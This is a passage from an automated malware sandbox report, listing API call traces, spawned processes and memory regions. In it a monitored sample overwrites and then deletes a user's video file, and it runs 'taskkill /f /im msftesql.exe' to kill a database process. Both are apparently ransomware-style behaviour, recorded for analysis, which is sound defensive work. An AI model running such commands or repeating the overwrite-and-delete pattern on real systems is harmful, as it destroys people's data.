lpBuffer=0x17694000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1265be78, lpOverlapped=0x0 | out: lpBuffer=0x17694000*, lpNumberOfBytesWritten=0x1265be78*=0xfa000, lpOverlapped=0x0) returned 1 [0320.200] CloseHandle (hObject=0x1f4) returned 1 [0320.211] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0320.364] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0320.370] SetEvent (hEvent=0x184) returned 1 [0320.370] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0320.372] SetEvent (hEvent=0x134) returned 1 [0320.372] SetEvent (hEvent=0x21c) returned 1 [0320.372] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0320.404] SetEvent (hEvent=0x14c) returned 1 [0320.404] SwitchToThread () returned 1 [0320.405] SetEvent (hEvent=0x14c) returned 1 [0320.406] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0320.410] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0320.711] SetEvent (hEvent=0x22c) returned 1 [0320.711] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0320.721] SetEvent (hEvent=0x1ac) returned 1 [0320.721] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0320.832] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\wDTVvpZ38Fq9891Oa2hg.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\wdtvvpz38fq9891oa2hg.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x240 [0320.841] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0320.961] GetConsoleMode (in: hConsoleHandle=0x240, lpMode=0x125dee88 | out: lpMode=0x125dee88) returned 0 [0320.961] WriteFile (in: hFile=0x240, lpBuffer=0x18d74000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125dee78, lpOverlapped=0x0 | out: lpBuffer=0x18d74000*, lpNumberOfBytesWritten=0x125dee78*=0xfa000, lpOverlapped=0x0) returned 1 [0320.988] CloseHandle (hObject=0x240) returned 1 [0320.988] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\wDTVvpZ38Fq9891Oa2hg.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\wdtvvpz38fq9891oa2hg.mp4")) returned 1 [0321.083] SetEvent (hEvent=0x21c) returned 1 [0321.083] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0321.115] SetEvent (hEvent=0x14c) returned 1 [0321.115] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0321.116] SetEvent (hEvent=0x12c) returned 1 [0321.116] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0321.119] SetEvent (hEvent=0x104) returned 1 [0321.119] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0321.125] SetEvent (hEvent=0x214) returned 1 [0321.125] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0321.128] SetEvent (hEvent=0x21c) returned 1 [0321.128] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0321.129] SetEvent (hEvent=0x1ac) returned 1 [0321.129] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) returned 0x0 [0321.205] SetEvent (hEvent=0x14c) returned 1 [0321.205] SetEvent (hEvent=0x22c) returned 1 [0321.205] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xffffffff) Process: id = "2" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x15c48000" os_pid = "0x117c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 285 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 286 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 287 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 288 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 289 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 290 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 291 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 292 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 293 start_va = 0x7ff642880000 end_va = 0x7ff642890fff monitored = 0 entry_point = 0x7ff6428816b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 294 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 295 start_va = 0x780000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 296 start_va = 0x7ff87ce40000 end_va = 0x7ff87d027fff monitored = 0 entry_point = 0x7ff87ce6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 297 start_va = 0x7ff87f640000 end_va = 0x7ff87f6ecfff monitored = 0 entry_point = 0x7ff87f6581a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 298 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 299 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 300 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 301 start_va = 0x7ff87fde0000 end_va = 0x7ff87fe7cfff monitored = 0 entry_point = 0x7ff87fde78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 302 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 303 start_va = 0x600000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 304 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 305 start_va = 0x7ff867c90000 end_va = 0x7ff867ce8fff monitored = 0 entry_point = 0x7ff867c9fbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 306 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 307 start_va = 0x7ff87f6f0000 end_va = 0x7ff87f96cfff monitored = 0 entry_point = 0x7ff87f7c4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 308 start_va = 0x7ff87fe80000 end_va = 0x7ff87ff9bfff monitored = 0 entry_point = 0x7ff87fec02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 309 start_va = 0x7ff87d030000 end_va = 0x7ff87d099fff monitored = 0 entry_point = 0x7ff87d066d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 310 start_va = 0x7ff87ed60000 end_va = 0x7ff87eeb5fff monitored = 0 entry_point = 0x7ff87ed6a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 311 start_va = 0x7ff87f3e0000 end_va = 0x7ff87f565fff monitored = 0 entry_point = 0x7ff87f42ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 312 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 313 start_va = 0x7ff87d3a0000 end_va = 0x7ff87d4e2fff monitored = 0 entry_point = 0x7ff87d3c8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 314 start_va = 0x7ff87f970000 end_va = 0x7ff87f9cafff monitored = 0 entry_point = 0x7ff87f9838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 315 start_va = 0x7ff87d4f0000 end_va = 0x7ff87d52afff monitored = 0 entry_point = 0x7ff87d4f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 316 start_va = 0x7ff87fa80000 end_va = 0x7ff87fb40fff monitored = 0 entry_point = 0x7ff87faa0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 317 start_va = 0x7ff87ab10000 end_va = 0x7ff87ac95fff monitored = 0 entry_point = 0x7ff87ab5d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 318 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 319 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 320 start_va = 0x880000 end_va = 0xa07fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 321 start_va = 0xa10000 end_va = 0xb90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 322 start_va = 0xba0000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ba0000" filename = "" Region: id = 323 start_va = 0x600000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 324 start_va = 0x740000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 325 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 326 start_va = 0x710000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 327 start_va = 0x7ff87c5d0000 end_va = 0x7ff87c5e3fff monitored = 0 entry_point = 0x7ff87c5d52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 328 start_va = 0x7ff87c5f0000 end_va = 0x7ff87c63afff monitored = 0 entry_point = 0x7ff87c5f35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 329 start_va = 0x7ff87c640000 end_va = 0x7ff87c64efff monitored = 0 entry_point = 0x7ff87c643210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 330 start_va = 0x7ff87c650000 end_va = 0x7ff87c704fff monitored = 0 entry_point = 0x7ff87c6922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 331 start_va = 0x7ff87c710000 end_va = 0x7ff87c752fff monitored = 0 entry_point = 0x7ff87c724b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 332 start_va = 0x7ff87c760000 end_va = 0x7ff87cda3fff monitored = 0 entry_point = 0x7ff87c9264b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 333 start_va = 0x7ff87d650000 end_va = 0x7ff87ebaefff monitored = 0 entry_point = 0x7ff87d7b11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 334 start_va = 0x7ff87fb50000 end_va = 0x7ff87fba1fff monitored = 0 entry_point = 0x7ff87fb5f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 335 start_va = 0x7ff87fd30000 end_va = 0x7ff87fdd6fff monitored = 0 entry_point = 0x7ff87fd458d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 336 start_va = 0x7ff87af40000 end_va = 0x7ff87afd5fff monitored = 0 entry_point = 0x7ff87af65570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 337 start_va = 0x1fa0000 end_va = 0x20affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 338 start_va = 0x20b0000 end_va = 0x23e6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 339 start_va = 0x23f0000 end_va = 0x2601fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 340 start_va = 0x2610000 end_va = 0x2827fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 341 start_va = 0x2830000 end_va = 0x2939fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002830000" filename = "" Region: id = 342 start_va = 0x2940000 end_va = 0x2b57fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002940000" filename = "" Region: id = 343 start_va = 0x2b60000 end_va = 0x2c75fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b60000" filename = "" Region: id = 344 start_va = 0x640000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 345 start_va = 0x7ff87fbb0000 end_va = 0x7ff87fd09fff monitored = 0 entry_point = 0x7ff87fbf38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 346 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 347 start_va = 0x1fa0000 end_va = 0x205bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fa0000" filename = "" Region: id = 348 start_va = 0x20a0000 end_va = 0x20affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 349 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 350 start_va = 0x7ff87a590000 end_va = 0x7ff87a5b1fff monitored = 0 entry_point = 0x7ff87a591a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 351 start_va = 0x7ff87ad00000 end_va = 0x7ff87ad12fff monitored = 0 entry_point = 0x7ff87ad02760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 352 start_va = 0x7ff87c3d0000 end_va = 0x7ff87c425fff monitored = 0 entry_point = 0x7ff87c3e0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 353 start_va = 0x60000 end_va = 0x66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 354 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 355 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 356 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 357 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 358 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 359 start_va = 0x680000 end_va = 0x680fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 360 start_va = 0x690000 end_va = 0x691fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 361 start_va = 0x2c80000 end_va = 0x2e75fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c80000" filename = "" Region: id = 362 start_va = 0x7ff872050000 end_va = 0x7ff8722c3fff monitored = 0 entry_point = 0x7ff8720c0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 363 start_va = 0x6a0000 end_va = 0x6a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 364 start_va = 0x6b0000 end_va = 0x6b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 365 start_va = 0x2e80000 end_va = 0x2f5cfff monitored = 0 entry_point = 0x2ede0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 366 start_va = 0x6a0000 end_va = 0x6a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 367 start_va = 0x2e80000 end_va = 0x2f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e80000" filename = "" Region: id = 368 start_va = 0x2f80000 end_va = 0x317efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002f80000" filename = "" Thread: id = 2 os_tid = 0x1180 Thread: id = 3 os_tid = 0x1198 Thread: id = 4 os_tid = 0x11d4 Thread: id = 5 os_tid = 0x11ec Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x46eaf000" os_pid = "0xeac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im msftesql.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 414 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 415 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 416 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 417 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 418 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 419 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 420 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 421 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 422 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 423 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 424 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 425 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 426 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 427 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 428 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 429 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 430 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 431 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 432 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 433 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 434 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 435 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 436 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 437 start_va = 0x560000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 438 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 439 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 440 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 441 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 442 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 443 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 444 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 445 start_va = 0x560000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 446 start_va = 0x690000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 447 start_va = 0x790000 end_va = 0x97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 448 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 449 start_va = 0x30000 end_va = 0x33fff monitored = 1 